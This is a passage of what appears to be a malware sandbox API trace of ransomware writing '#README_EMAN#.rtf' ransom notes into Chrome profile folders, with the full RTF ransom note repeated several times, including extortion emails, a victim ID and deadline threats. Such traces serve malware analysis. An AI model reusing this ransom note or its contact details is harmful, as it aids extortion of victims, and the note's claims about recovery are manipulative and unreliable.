BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.256] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.257] CloseHandle (hObject=0x2c8) returned 1 [0280.257] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0x20 [0280.257] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0280.257] GetLastError () returned 0x2 [0280.257] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.259] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.259] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.259] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 